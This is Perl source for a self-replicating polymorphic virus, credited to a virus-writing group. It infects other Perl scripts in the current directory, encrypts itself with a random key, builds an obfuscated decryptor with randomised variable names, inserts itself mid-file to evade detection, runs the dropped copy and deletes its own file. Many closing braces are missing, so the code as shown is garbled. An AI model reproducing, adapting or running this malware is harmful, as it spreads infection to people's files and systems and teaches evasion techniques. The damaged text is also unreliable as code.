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# 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]
open(File,$0);@Virus=<File>;close(File); # read own code
$Virus=join("", @Virus);foreach $FileName(<*>) { # get files
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { # check file
open(File, "$FileName");@Temp=<File>;close(File); # open file
if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) { # perl file ?
if (( length(@Temp[0]) % 5 ) != 0 ){ # already infected ?
# first we generate a decryptor
$Key = int(rand(255)); # cryptkey
$crypttype = int(rand(2)); # how to crypt it ?
for ( $X = 0; $X < length($Virus); $X++ ){ # Encrypt it
if ( $crypttype == 0 ){
@Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key); # Multiply
} else {
@Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key); # Addition
$connectit = chr(int(rand(25)+65));
$VirString = join($connectit, @Crypt); # all values get seperated by a !
$filename = chr(int(rand(25)+65)); # random filename to put virus to
$filename .= int(rand(65535));
if ( int(rand(2)) == 0 ){
@Vir[0] = "\$l1l = \"$VirString\"\;";
@Vir[1] = "\$11l = $Key\;"; # key to decrypt
} else {
@Vir[0] = "\$11l = $Key\;"; # key to decrypt
@Vir[1] = "\$l1l = \"$VirString\"\;";
@Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
@Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { "; # Decrypt Loop
if ( $crypttype == 0 ){
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;"; # Decrypt Char
} else {
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;"; # Decrypt Char
@Vir[5] = "}";
@Vir[6] = "open(1l1, \">$filename\")\;"; # write encrypted
@Vir[7] = "print 1l1 \$l11\;"; # string to a file
@Vir[8] = "close(1l1)\;";
@Vir[9] = "\$lll = \`perl $filename\`;\n"; # and start it
# change variables
# $Virus File @Virus $X $Key $Vir
# l1l 1l1 ll1 lll 11l l11
@vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
foreach $replace (@vars){
$newVar = chr(int(rand(25)+65)); # with a letter
$newVar .= int(rand(65535)); # and a random number
for ( $b=0; $b < @Vir; $b++){
@Vir[$b] =~ s/$replace/$newVar/g ;
do {
chomp @Temp[0];
@Temp[0] .= " \n";
} until((length(@Temp[0]) % 5) == 0 );
open(File, ">$FileName"); # and write the infected
$Temp = join("\n", @Vir);
for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
if ( @Temp[$X] =~ "\;\n" ) { # insert virus in the middle
$Temp2 = join("", @Temp[0..$X]); # write first part
print File $Temp2; # and virus
print File $Temp; $X++;
$Y = (@Temp);
$Temp2 = join("", @Temp[$X..$Y]); # insert rest of the file
print File $Temp2;
goto CloseFile;
$Temp2 = join("", @Temp); # no possibility to insert virus
print File $Temp; # file back to disk
print File $Temp2; # without EPO
$a = `rm $0`; # delete our selves..